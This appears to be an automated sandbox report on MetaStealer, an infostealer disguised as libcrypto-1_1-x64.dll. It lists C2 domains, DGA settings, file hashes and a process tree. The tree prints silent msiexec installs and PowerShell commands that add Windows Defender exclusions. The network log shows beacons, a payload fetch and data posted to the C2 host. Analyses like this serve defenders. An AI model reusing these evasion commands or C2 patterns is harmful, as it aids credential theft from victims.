Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    05/07/2024, 17:36 UTC

General

  • Target

    libcrypto-1_1-x64.dll

  • Size

    2.1MB

  • MD5

    e37cf85193275925afdb82a266069174

  • SHA1

    8027ca74a08e02dc096a9a3f92081bd5a7a20c67

  • SHA256

    307ec11b5a2a83aa2787b8f3cbecb4ea93868a3b3982ebbd5392f3efe9141c78

  • SHA512

    16db460c1872711a9e84cbe60d587adf56750ff0720b50c992b749bf3f3e8f50d76af9976742aaf933bcded4ab663c6134dec8593b5d071af8eb0050f1285418

  • SSDEEP

    49152:onej4p8c8PFouXSgeAx7rRJHULSn17x95XsjRDFtEMawsusXxQ61CPwDv3uFfJ7:Ks+uXh7LUq17TWdDFtEUx61CPwDv3uFZ

Malware Config

Extracted

Family

metastealer

C2

kiyaqoimsiieeyqa.xyz

ssqsmisuowqcwsqo.xyz

ykqmwgsuummieaug.xyz

ewukeskgqswqesiw.xyz

cscqcsgewmwwaaui.xyz

cyoksykiamiscyia.xyz

okgomokemoucqeso.xyz

ikwacuakiqeimwua.xyz

aawcsqqaywckiwmi.xyz

aiqasksgmyeqocei.xyz

qgumcuisgaeyuqqe.xyz

eiesoycamyqqgcea.xyz

ywceswakicsqomqw.xyz

auaieuewouawygku.xyz

cmiascusccywowcs.xyz

uiqkkomkaceqacec.xyz

quqeciymqmkqccqw.xyz

ssqsauuuyyigouou.xyz

aogaakukuugqswcy.xyz

ucgwcwsuqsuwewgc.xyz

Attributes
  • dga_seed

    21845

  • domain_length

    16

  • num_dga_domains

    10000

  • port

    443

Signatures

  • Meta Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • MetaStealer payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 7 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcrypto-1_1-x64.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /i "C:\Users\Admin\AppData\Local\Microsoft\Windows\windrv.msi" /Qn
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2248
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 24DB8638B7DB85DCF8AD99819F57FCDD
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:992
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:2768
      • C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\files\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\files\setup.exe" /VERYSILENT /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\systemtask.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
        • C:\Windows\SysWOW64\systeminfo.exe
          systeminfo
          4⤵
          • Gathers system information
          PID:1308
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Microsoft\windows\systemtask.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1132

Network

  • flag-us
    DNS
    acuucgyaammsawgq.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    acuucgyaammsawgq.xyz
    IN A
    Response
  • flag-us
    DNS
    awmyqcwcsmuocukc.xyz
    setup.exe
    Remote address:
    8.8.8.8:53
    Request
    awmyqcwcsmuocukc.xyz
    IN A
    Response
    awmyqcwcsmuocukc.xyz
    IN A
    31.192.232.19
  • flag-us
    GET
    http://awmyqcwcsmuocukc.xyz:443/api/client_hello
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:04 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 8ae1800d-5c4b-4861-99b3-665fa2402c43
    Connection: close
  • flag-us
    GET
    http://awmyqcwcsmuocukc.xyz:443/avast_update
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    GET /avast_update HTTP/1.1
    Accept: */*
    Connection: close
    File-Type: 0
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:35 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 9786de14-38a4-4bf3-9475-9ded44809bb7
    Connection: close
    Transfer-Encoding: chunked
  • flag-us
    GET
    http://awmyqcwcsmuocukc.xyz:443/api/client_hello
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    GET /api/client_hello HTTP/1.1
    Accept: */*
    Connection: close
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:41 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 5d717593-de76-486a-88fb-cde1e1fa57ae
    Connection: close
  • flag-us
    POST
    http://awmyqcwcsmuocukc.xyz:443/api/client/new
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    POST /api/client/new HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 32
    Content-Type: application/json
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 46
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:42 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 4617bd96-7cb1-4fa1-9e82-af7a7c123a8d
    Connection: close
  • flag-us
    POST
    http://awmyqcwcsmuocukc.xyz:443/tasks/get_worker
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    POST /tasks/get_worker HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 68
    Content-Type: application/json
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 167
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:43 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 66f74623-8fc9-45c7-b077-25302ee5d514
    Connection: close
  • flag-us
    POST
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 4416
    Content-Type: application/json
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:45 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 3b5ed8dc-058e-433b-a399-5988fdc72316
    Connection: close
  • flag-us
    POST
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 148
    Content-Type: application/json
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:45 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 44334a11-929b-4ca1-bdb3-748389f8531b
    Connection: close
  • flag-us
    POST
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    setup.exe
    Remote address:
    31.192.232.19:443
    Request
    POST /tasks/collect HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 148
    Content-Type: application/json
    Host: awmyqcwcsmuocukc.xyz:443
    User-Agent: cpp-httplib/0.12.1
    Response
    HTTP/1.1 200 OK
    Content-Length: 12
    Content-Type: text/plain; charset=utf-8
    Date: Fri, 05 Jul 2024 17:37:46 GMT
    Server: nginx/1.18.0 (Ubuntu)
    Vary: Origin
    X-Request-Id: 2ea2837b-fbe8-47bb-a647-d38793bb794b
    Connection: close
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/api/client_hello
    http
    setup.exe
    360 B
    457 B
    5
    5

    HTTP Request

    GET http://awmyqcwcsmuocukc.xyz:443/api/client_hello

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/avast_update
    http
    setup.exe
    232.9kB
    10.1MB
    4675
    7234

    HTTP Request

    GET http://awmyqcwcsmuocukc.xyz:443/avast_update

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/api/client_hello
    http
    setup.exe
    406 B
    457 B
    6
    5

    HTTP Request

    GET http://awmyqcwcsmuocukc.xyz:443/api/client_hello

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/api/client/new
    http
    setup.exe
    529 B
    531 B
    7
    6

    HTTP Request

    POST http://awmyqcwcsmuocukc.xyz:443/api/client/new

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/tasks/get_worker
    http
    setup.exe
    567 B
    653 B
    7
    6

    HTTP Request

    POST http://awmyqcwcsmuocukc.xyz:443/tasks/get_worker

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    http
    setup.exe
    5.0kB
    617 B
    10
    9

    HTTP Request

    POST http://awmyqcwcsmuocukc.xyz:443/tasks/collect

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    http
    setup.exe
    599 B
    497 B
    6
    6

    HTTP Request

    POST http://awmyqcwcsmuocukc.xyz:443/tasks/collect

    HTTP Response

    200
  • 31.192.232.19:443
    http://awmyqcwcsmuocukc.xyz:443/tasks/collect
    http
    setup.exe
    599 B
    497 B
    6
    6

    HTTP Request

    POST http://awmyqcwcsmuocukc.xyz:443/tasks/collect

    HTTP Response

    200
  • 8.8.8.8:53
    acuucgyaammsawgq.xyz
    dns
    setup.exe
    66 B
    139 B
    1
    1

    DNS Request

    acuucgyaammsawgq.xyz

  • 8.8.8.8:53
    awmyqcwcsmuocukc.xyz
    dns
    setup.exe
    66 B
    82 B
    1
    1

    DNS Request

    awmyqcwcsmuocukc.xyz

    DNS Response

    31.192.232.19

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\windrv.msi

    Filesize

    1.6MB

    MD5

    24cbbd2c70efbb75845548513114317e

    SHA1

    bd13f38e7301648b8cea6135a851b8691fda2c27

    SHA256

    b31e366ae13a960eb0efbfb5074b0abd1f300151289833d7dfa1a9382bea1855

    SHA512

    b7b0e4fa57e17b0da21a85f56f29a711ff226c8a9e95ca59721e4f20e32b9cbd8a5fdf69010e79f8452df5457a055cc2a41f2ad773eaf692680bc39cb8e50ead

  • C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\files.cab

    Filesize

    1.3MB

    MD5

    57c5b54337af1acd54c65c5abae694b2

    SHA1

    87b6b5eebf8fa70a42bd2cf192740b7130a521a2

    SHA256

    ead264b457fd74737f51a2c4bf5d4679d7e1dcdd1547aca6fe3bf7e117c9d0d8

    SHA512

    af10bdc86a45d59d6e46b5cfa942348360c3ac4312d122bf80783673c448861621811a2c3f4446355037b98a67f642cb8ae27945619d0cd32aaeff9656c0982e

  • C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\msiwrapper.ini

    Filesize

    1KB

    MD5

    b7f099d62c59872a745fd69ccc9941e7

    SHA1

    156a375bb71e46ad5fb99c177dc164cb299210c9

    SHA256

    ba5da424fc9f7f621ef4979fc88a89bc9a97bd627d6e331a2cf1d291ac0c8d4c

    SHA512

    b99197b82b6c5167f353ac8a25fef5f0dccc670824bd55d40428adccadd1957d3d3ea344e477cf0371e0680f698fd57e7674fe68b364fc2127e539daabcdd5d7

  • C:\Users\Admin\AppData\Local\Temp\MW-8c478490-427b-4e56-93a9-cbfb6dee7280\msiwrapper.ini

    Filesize

    1KB

    MD5

    b2e67a09b342b2b68a307ab2a5f23fd1

    SHA1

    97d9ace2fe81d244a5c349501a530a84d9364f10

    SHA256

    31f8df669699f7c691704a7fa513395064a9fe1cd4578f9c8981590416f00f2c

    SHA512

    fd8a809d4a42ba989ff4982cde9e43ce47de136b84506ba04e5883c66a9dd6dc35895fcd11f52d7f2e53724d7ab5fee6ff19015d0d4b6469d99d705e89684b92

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6bac546c53f88cb2ae168aea71ed04e0

    SHA1

    7a92d9e9b41f9ee1644ecd0595233eb86146c4d0

    SHA256

    72aea6379b7fe169dd277c4657080e347bf67c117bf6ffd8d045df20c3285379

    SHA512

    42873826a059bc9d32027c57032284710d2cb187e3d0637c3eb7ffd495ae5a979bce312f33469be258e419a468baf41708b0426ec4a5d4d6c8e54363e3fc32ab

  • C:\Windows\Installer\MSIFCC6.tmp

    Filesize

    208KB

    MD5

    0c8921bbcc37c6efd34faf44cf3b0cb5

    SHA1

    dcfa71246157edcd09eecaf9d4c5e360b24b3e49

    SHA256

    fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

    SHA512

    ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

  • memory/3016-70-0x0000000010000000-0x000000001072E000-memory.dmp

    Filesize

    7.2MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.